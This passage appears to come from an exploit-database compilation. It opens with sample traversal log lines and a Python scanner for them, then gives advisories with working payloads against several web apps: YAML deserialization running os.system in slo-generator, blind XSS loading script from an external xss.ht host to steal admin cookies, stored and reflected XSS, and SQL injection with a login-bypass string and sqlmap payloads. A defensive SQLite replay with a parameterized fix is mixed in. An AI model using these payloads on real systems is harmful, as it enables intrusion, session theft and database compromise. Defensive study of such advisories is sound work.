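10.0.0.5 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.74.0"
10.0.0.7 - - [05/Oct/2021:10:00:02 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 48 "-" "curl/7.74.0"
10.0.0.8 - - [05/Oct/2021:10:00:03 +0000] "GET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 9344 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Oct/2021:10:00:04 +0000] "GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 200 210 "-" "Mozilla/5.0"
10.0.0.10 - - [05/Oct/2021:10:00:05 +0000] "GET /docs/a..b/page.html?x=%2e%2e HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed list of servlet-container directories that must never be served.
PROTECTED_DIRS = {"WEB-INF", "META-INF"}


def path_segments(raw_path, max_decodes=3):
    """Normalise a request path the way a lenient server might before dispatch.

    Strips the query string, percent-decodes repeatedly (so %252e -> %2e -> .)
    and drops ';param' suffixes from every segment, which servlet containers
    remove before mapping the path but which a front-end proxy may pass through.
    """
    path = raw_path.split("?", 1)[0]
    for _ in range(max_decodes):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return [seg.split(";", 1)[0] for seg in path.split("/")]


def classify(raw_path):
    """Return the traversal patterns a request path matches (empty list if none)."""
    segs = path_segments(raw_path)
    findings = []
    if ".." in segs:
        if ".." in raw_path:
            findings.append("dot-segment traversal")
        else:
            # '..' only appears after decoding: the CVE-2021-41773 shape
            findings.append("encoded dot-segment traversal (CVE-2021-41773 shape)")
    if ";" in raw_path and PROTECTED_DIRS & {s.upper() for s in segs}:
        findings.append(
            "path-parameter bypass reaching WEB-INF/META-INF (CVE-2021-26085/26086 shape)"
        )
    return findings


def scan(log_text):
    """Return (ip, raw_path, status, findings) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m["path"])
        if findings:
            hits.append((m["ip"], m["path"], int(m["status"]), findings))
    return hits


if __name__ == "__main__":
    for ip, path, status, findings in scan(SAMPLE_LOG):
        print(f"{ip:10} {status} {path}\n    {'; '.join(findings)}")
```

A status of 200 on a flagged line is the strongest signal; a 400 from a patched server still records the attempt.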
-
Google SLO-Generator 2.0.0 - Code Execution
# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557

##############################################################################
*Introduction*:
slo-generator is a tool to compute and export Service Level Objectives (SLOs), Error Budgets and Burn Rates, using configurations written in YAML (or JSON) format.
##############################################################################

*POC:*
1. pip3 install slo-generator==2.0.0
2. Save the YAML below in a file named exploit.yaml:

!!python/object/apply:os.system ["id;whoami"]

3. Run the command below:

slo-generator migrate -b exploit.yaml
##############################################################################
-
Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
# Date: 2021-10-06
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
# Version: V 1.0
# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
# Tested on Windows 10, XAMPP

*Steps to Reproduce:*
1) Navigate to http://localhost/odms/book-services.php?bookid=1
2) Enter the blind XSS payload `"><script+src=https://yourxsshunterusername.xss.ht>` in the "name=", "vaddress=" and "addinfo=" parameters and click on "Book".

Request:
========
POST /odms/book-services.php?bookid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Origin: http://localhost
Connection: close
Referer: http://localhost/odms/book-services.php?bookid=1
Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

name="><script+src=https://biest.xss.ht></script>&[email protected]&mobnum=9999999999&edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script>&eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book

Now to confirm the vulnerability:
3) Login as admin by navigating to http://localhost/odms/admin/login.php.
4) As soon as the admin visits /view-booking-detail.php to approve the booking, the payload fires and the attacker receives details such as the admin's IP address and cookies.
5) Able to steal the admin's cookies successfully!!

# POC
https://ibb.co/Vj3jn2d
https://ibb.co/bm9MGdG
-
Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Stored and XSS Reflected
# All requests can be sent by both an authenticated and a non-authenticated user

# XSS Stored - example vulnerable pages and parameters:
* The entire application is susceptible to Stored XSS vulnerabilities; below are examples of pages and parameters
* We can upload an SVG file carrying XSS to all places in the web app
* We can add evil code from an admin account, a regular user account or unauthenticated - we only need the request

* http://localhost/traffic_offense/admin/?page=user
Parameters:
- firstname
- lastname
- user image - SVG file with JavaScript code - XSS

* http://localhost/traffic_offense/classes/Master.php?f=save_offense_record
Parameters:
- date_created
- ticket_no
- officer_id
- officer_name
- status
- remarks - SVG file with JavaScript code - XSS

* The whole application is vulnerable

# XSS Reflected - example vulnerable pages and parameters:
* http://localhost/traffic_offense/admin/?page
Parameters:
- page

* http://localhost/traffic_offense/classes/Login.php
Parameters:
- username
- password

* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
Parameters:
- id

* http://localhost/traffic_offense/classes/Master.php
Parameters:
- id

* http://localhost/traffic_offense/classes/Users.php
Parameters:
- id

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example 1 - XSS Reflected
# Request using POST method, payload is in the value of the id parameter

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583
Content-Length: 1061
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="id"

13<script>alert(1)</script>37
-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="firstname"

hacked
[...]

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 01:05:26 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 186
Connection: close
Content-Type: text/html; charset=UTF-8

UPDATE users set firstname = 'sdasfd' , lastname = 'fdxfd' , username = 'test2' , `password` = 'ad0234829205b9033196ba818f7a872b' where id = 13<script>alert(1)</script>37

-----------------------------------------------------------------------------------------------------------------------
# Request using GET method, payload is in the value of the id parameter

GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:28:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7893
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37''
<br />
[...]

-----------------------------------------------------------------------------------------------------------------------
## Example 2
# XSS Stored
# Save the JS payload in the user profile and add an SVG file through the vulnerable script

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102
Content-Length: 4304
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="id"

1
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="firstname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="lastname"

admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="username"

admin
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="password"

admnin123
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

[...]SVG PAYLOAD[...]

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:31:29 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

-----------------------------------------------------------------------------------------------------------------------
# Request to download the new user data

GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:42:04 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24719

[...]
<div class="form-group col-6">
    <label for="name">First Name</label>
    <input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
</div>
<div class="form-group col-6">
    <label for="name">Last Name</label>
    <input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
</div>
[...]
<div class="form-group col-6 d-flex justify-content-center">
    <img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">
</div>
[...]
-
Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### SQL Injection

# All requests can be sent by both an authenticated and an unauthenticated user
# Example vulnerable pages and parameters:

* http://localhost/traffic_offense/classes/Users.php
  Parameters:
  - id
  - firstname
  - lastname
  - username

* http://localhost/traffic_offense/classes/Login.php
  Parameters:
  - username
  - password

* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
  Parameters:
  - id

* http://localhost/traffic_offense/classes/Master.php
  Parameters:
  - id
  - date_created
  - ticket_no
  - status
  - offense_id
  - fine
  - code
  - name

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1
# Login request triggering an SQL error (a single quote in each field)
POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=xxxx'&password=xxxx2'
-----------------------------------------------------------------------------------------------------------------------
# Response (the application echoes the failed query in last_qry, which reveals the exact injection context)
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:31:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 265
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\classes\Login.php</b> on line <b>22</b><br />
{"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "}
-----------------------------------------------------------------------------------------------------------------------
# Exploitable request: the username parameter can be any value, the password parameter closes md5('...') and appends an always-true condition
POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 47
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/login.php
Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=admin&password=xxxx')+or+'1'='1'+and+('1
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 12:24:50 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}
-----------------------------------------------------------------------------------------------------------------------
Logged in as the admin account
-----------------------------------------------------------------------------------------------------------------------

## Example 2
# SQL injection detection, using a page with the id parameter as the example
# Request triggering an SQL error: append ' to the id parameter
GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

# Response: database error
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:56:37 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7837
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3''
<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>10</b><br />
<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>16</b>
[...]

# Request: append '' to the id parameter (a doubled quote is an escaped quote inside the string literal)
GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

# Response without an error: SQL injection confirmed
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 03:58:40 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7214
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="container-fluid">
    <div class="w-100 d-flex justify-content-end mb-2">
        <button class="btn btn-flat btn-sm btn-default bg-lightblue" type="button" id="print"><i class="fa fa-print"></i> Print</button>
        <button class="btn btn-flat btn-sm btn-default bg-black" data-dismiss="modal"><i class="fa fa-times"></i> Close</button>
    </div>
[...]
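Examples 1 and 2 are the same defect seen twice: the request value is spliced into the SQL text, so a quote ends the literal and whatever follows is parsed as SQL. The Python below is an added example (not the application's code and not part of the advisory) that replays both behaviours against an in-memory SQLite database: the login bypass against the query Login.php leaked in its last_qry field, with a parameterized version beside it, and the ' versus '' probe from Example 2. The table layouts, the admin password and the use of SQLite with a registered md5() in place of MariaDB are assumptions made for the example; the two query shapes are taken from the responses above.

```python
"""Added example: login bypass and quote-pair probe replayed in SQLite.

Assumptions (not from the page): the schema, the constructed admin
password, and SQLite standing in for the target's MariaDB. The query
strings mirror the ones the application leaked in its responses.
"""
import hashlib
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the application database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no md5(); register one so the leaked query text runs unchanged.
    conn.create_function(
        "md5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE offense_list (id INTEGER PRIMARY KEY, ticket_no TEXT);
        INSERT INTO offense_list VALUES (3, 'TKT-0003');
    """)
    # Constructed credentials; the attacker never needs to know this value.
    conn.execute("INSERT INTO users VALUES (1, 'admin', md5('constructed-admin-pw'))")
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """String-built query, exactly the shape Login.php leaked in last_qry."""
    qry = ("SELECT * from users where username = '" + username
           + "' and password = md5('" + password + "') ")
    return conn.execute(qry).fetchone() is not None


def safe_login(conn, username, password):
    """Same logic with bound parameters: the input is data, never SQL text."""
    qry = "SELECT * from users where username = ? and password = md5(?)"
    return conn.execute(qry, (username, password)).fetchone() is not None


def vulnerable_view_details(conn, record_id):
    """Mirrors view_details.php: the id is quoted but not escaped."""
    qry = "SELECT r.* from offense_list r where r.id = '" + record_id + "'"
    return conn.execute(qry).fetchall()


def quote_pair_probe(conn, record_id):
    """Example 2's detection step: a lone quote must break the statement,
    a doubled quote (an escaped quote inside the literal) must not.
    Seeing both outcomes is the signal that input lands in the SQL text."""
    outcome = {}
    for suffix in ("'", "''"):
        try:
            vulnerable_view_details(conn, record_id + suffix)
            outcome[suffix] = "ok"
        except sqlite3.OperationalError:
            outcome[suffix] = "sql error"
    return outcome


if __name__ == "__main__":
    db = build_db()
    # Example 1's password value, URL-decoded. The resulting WHERE clause is
    #   username = 'admin' and password = md5('xxxx') or '1'='1' and ('1')
    # and the OR branch is always true, whatever the username.
    bypass = "xxxx') or '1'='1' and ('1"
    print("vulnerable login:", vulnerable_login(db, "admin", bypass))  # True
    print("parameterized:   ", safe_login(db, "admin", bypass))        # False
    print("quote probe:     ", quote_pair_probe(db, "3"))
```

The probe result `{"'": "sql error", "''": "ok"}` is the same pair of responses the two Example 2 requests produced against the real application.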
-----------------------------------------------------------------------------------------------------------------------
## Example 3
# Using sqlmap on an intercepted request to http://localhost/traffic_offense/classes/Master.php
# (the '*' after a value marks it as a custom injection point for sqlmap)
POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1
Origin: http://localhost
Content-Length: 1598
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: localhost:80
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1
Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385
Sec-Fetch-Dest: empty

-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="id"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="date_created"

2021-08-18T15:00*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="ticket_no"

12345678
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="driver_id"

1
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_id"

OFC-789456123
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="officer_name"

George
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="status"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

1*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

652*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="offense_id[]"

3*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="fine[]"

1001*
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"

1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"

Sample
-----------------------------7900788429998101281579901385--

# Using the sqlmap utility
C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.9.6#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:52:47 /2021-10-07/

[05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
Multipart-like data found in POST body. Do you want to process it? [Y/n/q]
[05:52:51] [INFO] testing connection to the target URL
[...]
---
# sqlmap results. Each payload below lists only the multipart field sqlmap modified; every other field of the payload is identical to the intercepted request above.

Parameter: MULTIPART #4* ((custom) POST)   (injected field: fine[], original value 652)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: fine[] = 652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: fine[] = 652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fine[] = 652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm

Parameter: MULTIPART #5* ((custom) POST)   (injected field: second offense_id[], original value 3)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: offense_id[] = 3' AND 4015=4015 AND 'mPLR'='mPLR

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: offense_id[] = 3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: offense_id[] = 3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC

Parameter: MULTIPART #6* ((custom) POST)   (injected field: second fine[], original value 1001)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: fine[] = 1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: fine[] = 1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fine[] = 1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB

Parameter: MULTIPART #2* ((custom) POST)   (injected field: status, original value 1)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: status = 1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: status = 1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: status = 1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD

